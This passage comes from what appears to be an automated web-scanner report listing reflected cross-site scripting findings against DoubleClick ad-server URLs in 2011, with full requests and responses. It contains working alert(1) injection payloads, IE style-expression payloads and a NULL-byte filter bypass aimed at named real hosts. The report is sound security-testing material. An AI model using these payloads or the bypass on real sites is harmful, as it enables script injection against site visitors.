8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-4809460702016037&adurl=eca1a"-alert(1)-"9f45c7913eahttp://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm?withphone=N&CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = ""
...[SNIP]...

3.42. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be53b"-alert(1)-"3b9fd4c6033 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B5zgm-31lTcvxAcv1lAfG8bDkBfbMhfIBhtia8hf45pedJwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi00ODA5NDYwNzAyMDE2MDM3oAHOifnyA7IBEHd3dy5rb21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAEbe53b"-alert(1)-"3b9fd4c6033&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-4809460702016037&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt2___3533310**0_3805*MEn_114**_-862839443;ord=4972427075776531456258795481640? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Feb 2011 21:37:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9041

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
d3dy5rb21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAEbe53b"-alert(1)-"3b9fd4c6033&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-4809460702016037&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt
...[SNIP]...

3.43. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5cb52"-alert(1)-"1e7e78e8863 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B5zgm-31lTcvxAcv1lAfG8bDkBfbMhfIBhtia8hf45pedJwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi00ODA5NDYwNzAyMDE2MDM3oAHOifnyA7IBEHd3dy5rb21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-48094607020160375cb52"-alert(1)-"1e7e78e8863&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt2___3533310**0_3805*MEn_114**_-862839443;ord=4972427075776531456258795481640? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Feb 2011 21:38:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9041

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-48094607020160375cb52"-alert(1)-"1e7e78e8863&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt2___3533310**0_3805*MEn_114**_-862839443http%3a%2f%2fwww22.verizon.com/resid
...[SNIP]...

3.44. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e702a"-alert(1)-"d6cda420b15 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B5zgm-31lTcvxAcv1lAfG8bDkBfbMhfIBhtia8hf45pedJwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi00ODA5NDYwNzAyMDE2MDM3oAHOifnyA7IBEHd3dy5rb21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1e702a"-alert(1)-"d6cda420b15&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-4809460702016037&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt2___3533310**0_3805*MEn_114**_-862839443;ord=4972427075776531456258795481640? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Feb 2011 21:37:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9041

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
b21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1e702a"-alert(1)-"d6cda420b15&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-4809460702016037&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt2___35
...[SNIP]...

3.45. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d87dc"-alert(1)-"7e5e79f9c31 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B5zgm-31lTcvxAcv1lAfG8bDkBfbMhfIBhtia8hf45pedJwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi00ODA5NDYwNzAyMDE2MDM3oAHOifnyA7IBEHd3dy5rb21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWgd87dc"-alert(1)-"7e5e79f9c31&client=ca-pub-4809460702016037&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt2___3533310**0_3805*MEn_114**_-862839443;ord=4972427075776531456258795481640? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Feb 2011 21:38:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9078

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
YaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWgd87dc"-alert(1)-"7e5e79f9c31&client=ca-pub-4809460702016037&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt2___3533310**0_3805*MEn_114**_-862839443http%
...[SNIP]...

3.46. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99793"-alert(1)-"db897f05fa3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l99793"-alert(1)-"db897f05fa3&ai=B5zgm-31lTcvxAcv1lAfG8bDkBfbMhfIBhtia8hf45pedJwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi00ODA5NDYwNzAyMDE2MDM3oAHOifnyA7IBEHd3dy5rb21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-4809460702016037&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt2___3533310**0_3805*MEn_114**_-862839443;ord=4972427075776531456258795481640? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 23 Feb 2011 21:37:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9118

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
rl = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ab7/f/283/%2a/t%3B236744794%3B2-0%3B0%3B56548503%3B4307-300/250%3B40625974/40643761/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=l99793"-alert(1)-"db897f05fa3&ai=B5zgm-31lTcvxAcv1lAfG8bDkBfbMhfIBhtia8hf45pedJwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi00ODA5NDYwNzAyMDE2MDM3oAHOifnyA7IBEHd3dy5rb21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3
...[SNIP]...

3.47. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/front_nonsub

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35e6e"style%3d"x%3aexpression(alert(1))"c302ea03cd0 was submitted in the !category parameter. This input was echoed as 35e6e"style="x:expression(alert(1))"c302ea03cd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/front_nonsub;!category=;;tile=2;sz=280x61;ord=4795479547954795;35e6e"style%3d"x%3aexpression(alert(1))"c302ea03cd0 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; ebNewBandWidth_.ad.doubleclick.net=3163%3A1302177152798

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 19 Apr 2011 16:18:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 413

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aee/0/0/%2a/e;44306;0-0;0;29743509;28940-280/61;0/0/0;;~okv=;!category=;;tile=2;sz=280x61;35e6e"style="x:expression(alert(1))"c302ea03cd0;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

3.48. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/front_nonsub

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea556"style%3d"x%3aexpression(alert(1))"4af9e3c6c90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea556"style="x:expression(alert(1))"4af9e3c6c90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/front_nonsub;u=V1-OGZhYzMxMzktMDYxNy00NjVkLTk5NjAtMjI5OTVhOGM5NjM4%5E%5E;!category=;;tile=1;sz=280x46;ord=4795479547954795;&ea556"style%3d"x%3aexpression(alert(1))"4af9e3c6c90=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; ebNewBandWidth_.ad.doubleclick.net=3163%3A1302177152798

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 19 Apr 2011 16:16:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 527

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aee/0/0/%2a/k;44306;0-0;0;29743509;16875-280/46;0/0/0;u=V1-OGZhYzMxMzktMDYxNy00NjVkLTk5NjAtMjI5OTVhOGM5NjM4^^;~okv=;u=V1-OGZhYzMxMzktMDYxNy00NjVkLTk5NjAtMjI5OTVhOGM5NjM4^^;!category=;;tile=1;sz=280x46;&ea556"style="x:expression(alert(1))"4af9e3c6c90=1;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

3.49. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/front_nonsub

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22a8c"style%3d"x%3aexpression(alert(1))"5f70a057ace was submitted in the u parameter. This input was echoed as 22a8c"style="x:expression(alert(1))"5f70a057ace in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/front_nonsub;u=V1-OGZhYzMxMzktMDYxNy00NjVkLTk5NjAtMjI5OTVhOGM5NjM4%5E%5E;!category=;;tile=1;sz=280x46;ord=4795479547954795;22a8c"style%3d"x%3aexpression(alert(1))"5f70a057ace HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; ebNewBandWidth_.ad.doubleclick.net=3163%3A1302177152798

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 19 Apr 2011 16:16:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 524

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aee/0/0/%2a/k;44306;0-0;0;29743509;16875-280/46;0/0/0;u=V1-OGZhYzMxMzktMDYxNy00NjVkLTk5NjAtMjI5OTVhOGM5NjM4^^;~okv=;u=V1-OGZhYzMxMzktMDYxNy00NjVkLTk5NjAtMjI5OTVhOGM5NjM4^^;!category=;;tile=1;sz=280x46;22a8c"style="x:expression(alert(1))"5f70a057ace;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

3.50. http://ad.doubleclick.net/adi/interactive.wsj.com/front_sub [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/front_sub

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca4b2"style%3d"x%3aexpression(alert(1))"7b4c6eb6661 was submitted in the !category parameter. This input was echoed as ca4b2"style="x:expression(alert(1))"7b4c6eb6661 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/front_sub;!category=;;tile=3;sz=377x140;ord=4795479547954795;ca4b2"style%3d"x%3aexpression(alert(1))"7b4c6eb6661 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; ebNewBandWidth_.ad.doubleclick.net=3163%3A1302177152798

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 19 Apr 2011 16:18:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 510

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aee/0/0/%2a/d;215935200;6-0;0;29217874;29332-377/140;38766073/38783830/1;;~okv=;!category=;;tile=3;sz=377x140;ca4b2"style="x:expression(alert(1))"7b4c6eb6661;~aopt=6/1/ff/1;~sscs=%3fhttp://it-jobs.fins.com/?reflink=djm_bcu_tech_x140">
...[SNIP]...

3.51. http://ad.doubleclick.net/adj/KOMO/HOME [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/KOMO/HOME

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00322a1'-alert(1)-'c7b800a0218 was submitted in the sz parameter. This input was echoed as 322a1'-alert(1)-'c7b800a0218 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/KOMO/HOME;sz=%00322a1'-alert(1)-'c7b800a0218 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.komonews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 50373
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 23 Feb 2011 21:47:29 GMT
Expires: Wed, 23 Feb 2011 21:47:29 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
://ad.doubleclick.net/activity;src=2127271;stragg=1;v=1;pid=18824836;aid=236883395;ko=0;cid=40818774;rid=40836561;rv=1;rn=2864662;";
this.swfParams = 'src=2127271&rv=1&rid=40836561&=%00322a1'-alert(1)-'c7b800a0218&';
this.renderingId = "40836561";
